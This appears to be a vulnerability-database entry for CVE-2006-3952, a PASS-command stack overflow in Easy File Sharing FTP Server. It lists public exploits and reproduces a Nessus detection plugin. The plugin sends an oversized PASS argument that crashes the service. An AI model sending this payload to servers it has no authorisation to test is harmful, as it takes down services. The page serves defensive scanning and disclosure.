Vulnerabilities > CVE-2006-3952 - Remote Buffer Overflow vulnerability in EFS Software EFS FTP Server 2.0

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
efs-software
nessus
exploit available
metasploit

Summary

Stack-based buffer overflow in EFS Software Easy File Sharing FTP Server 2.0 allows remote attackers to execute arbitrary code via a long argument to the PASS command. NOTE: the provenance of this information is unknown; the details are obtained from third party information.

Vulnerable Configurations

Part Description Count
Application
Efs_Software
1

Exploit-Db

  • description: Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4). CVE-2006-3952. Remote exploit for windows platform
    id: EDB-ID:3579
    last seen: 2016-01-31
    modified: 2007-03-26
    published: 2007-03-26
    reporter: Winny Thomas
    source: https://www.exploit-db.com/download/3579/
    title: Easy File Sharing FTP Server 2.0 PASS Remote Exploit Win2K SP4
  • description: Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow. CVE-2006-3952. Remote exploit for windows platform
    id: EDB-ID:33538
    last seen: 2016-02-03
    modified: 2014-05-27
    published: 2014-05-27
    reporter: superkojiman
    source: https://www.exploit-db.com/download/33538/
    title: Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow
  • description: Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC). CVE-2006-3952. Remote exploit for windows platform
    id: EDB-ID:2234
    last seen: 2016-01-31
    modified: 2006-08-21
    published: 2006-08-21
    reporter: h07
    source: https://www.exploit-db.com/download/2234/
    title: Easy File Sharing FTP Server 2.0 PASS Remote Exploit PoC
  • description: Easy File Sharing FTP Server 2.0 PASS Overflow. CVE-2006-3952. Remote exploit for windows platform
    id: EDB-ID:16742
    last seen: 2016-02-02
    modified: 2010-05-09
    published: 2010-05-09
    reporter: metasploit
    source: https://www.exploit-db.com/download/16742/
    title: Easy File Sharing FTP Server 2.0 PASS Overflow

Metasploit

description: This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code.
id: MSF:EXPLOIT/WINDOWS/FTP/EASYFILESHARING_PASS
last seen: 2020-01-25
modified: 2017-07-24
published: 2007-03-26
references: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3952
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/easyfilesharing_pass.rb
title: Easy File Sharing FTP Server 2.0 PASS Overflow

Nessus

NASL family: FTP
NASL id: EFS_FTP_SERVER_PASS_OVERFLOW.NASL
description: The remote host appears to be using Easy File Sharing FTP Server, an FTP server for Windows. The version of Easy File Sharing FTP Server installed on the remote host contains a stack-based buffer overflow vulnerability that can be exploited by an unauthenticated attacker with a specially crafted PASS command to crash the affected application or execute arbitrary code on the affected host.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 24021
published: 2007-01-17
reporter: This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/24021
title: Easy File Sharing FTP Server PASS Command Overflow
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration block: runs only when `description` is set, i.e. when the
# scanner loads the plugin to read its metadata. It ends with exit(0), so none
# of the check logic further down executes in that mode.
if (description)
{
  script_id(24021);
  script_version("1.19");
  script_cvs_date("Date: 2018/07/10 14:27:33");

  # Cross-references used to correlate this finding with other advisories.
  script_cve_id("CVE-2006-3952");
  script_bugtraq_id(19243);
  script_xref(name:"EDB-ID", value:"2234");
  script_xref(name:"EDB-ID", value:"33538");

  script_name(english:"Easy File Sharing FTP Server PASS Command Overflow");
  script_summary(english:"Checks for PASS command buffer overflow vulnerability in EFS FTP Server");

  script_set_attribute(attribute:"synopsis", value:"The remote FTP server is affected by a buffer overflow vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be using Easy File Sharing FTP Server, an
FTP server for Windows.

The version of Easy File Sharing FTP Server installed on the remote
host contains a stack-based buffer overflow vulnerability that can be
exploited by an unauthenticated attacker with a specially crafted PASS
command to crash the affected application or execute arbitrary code on
the affected host.");
  # NOTE(review): the solution text says no fix is known, yet the temporal
  # vector below carries RL:OF (official fix available). The two disagree;
  # confirm against the vendor's release notes which one is correct.
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");
  # CVSS v2 base vector: network reachable, low complexity, no authentication,
  # partial impact on confidentiality, integrity and availability.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  # CVSS v2 temporal vector: functional exploit (E:F), official fix (RL:OF),
  # confirmed report (RC:C).
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  # Exploit-availability attributes; useful for prioritising remediation.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Easy File Sharing FTP Server 2.0 PASS Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/07/31");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/01/17");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_DENIAL: the check below tries to take the FTP service down to prove
  # the flaw. Scanners normally skip this category when safe checks are
  # enabled; run it only where a service interruption is acceptable.
  script_category(ACT_DENIAL);
  script_family(english:"FTP");
  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");
  # Presumably the FTP detection plugin that records the banner and port this
  # check reads later; verify against that plugin.
  script_dependencies("ftpserver_detect_type_nd_version.nasl");
  # Keeps the plugin from being scheduled when the scan is limited to supplied
  # logins; the check logic repeats that test at run time.
  script_exclude_keys("global_settings/supplied_logins_only");
  script_require_ports("Services/ftp", 21);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("ftp_func.inc");
include("misc_func.inc");

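# Remote check for the PASS-command stack overflow in Easy File Sharing FTP
# Server (CVE-2006-3952). The result is inferred from a crash: the plugin sends
# one oversized PASS argument and reports the host only if the service stops
# answering afterwards. It is registered as ACT_DENIAL, so a positive result
# means the FTP service was taken down and has to be restarted.

# Honor the "supplied logins only" scan setting: the check falls back to the
# anonymous account below, so it must not run when only supplied credentials
# may be used.
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

port = get_ftp_port(default: 21);

# Make sure the banner indicates Easy File Sharing FTP Server. A server whose
# banner has been changed or suppressed is skipped here, so a clean result is
# not proof that the host is unaffected.
banner = get_ftp_banner(port:port);
if (!banner || "Easy File Sharing FTP Server" >!< banner)
 exit(0, "The FTP server on port "+port+" is not Easy File Sharing.");


soc = open_sock_tcp(port);
if (!soc) exit(1, "Cannot connect to TCP port "+port+".");
# Consume the greeting line so that the next read returns the USER reply.
s = ftp_recv_line(socket:soc);


# Destructive part of the check: log in far enough to reach the PASS handler.
# Use the login stored in the knowledge base, else the anonymous account.
user = get_kb_item("ftp/login");
if (!user) user = "anonymous";

c = strcat("USER ", user);
send(socket:soc, data: c+'\r\n');
s = ftp_recv_line(socket:soc);

# The match is on the exact reply text, so a server that words its 331 reply
# differently is not tested.
if (s && '331 username ok, need password.' >< s) {
  exploit = strcat(",", crap(2571));
  c = strcat("PASS ", exploit);
  send(socket:soc, data: c+'\r\n');
  s = ftp_recv_line(socket:soc);
  close(soc);
  # Any reply means the service survived the request: treat as not affected.
  if (s) exit(0, "The FTP server on port "+port+" replied to the test PASS command and was not flagged.");

  # Check whether the server is down.
  if (service_is_dead(port: port, exit: 1) > 0)
    security_hole(port);
}
else {
  # Previously this path left the socket open and ended without a message.
  close(soc);
  exit(0, "The FTP server on port "+port+" did not return the expected 331 reply to USER, so the check was not performed.");
}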

Packetstorm

Seebug

bulletinFamily: exploit
description: No description provided by source.
id: SSV:86747
last seen: 2017-11-19
modified: 2014-07-01
published: 2014-07-01
reporter: Root
source: https://www.seebug.org/vuldb/ssvid-86747
title: Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow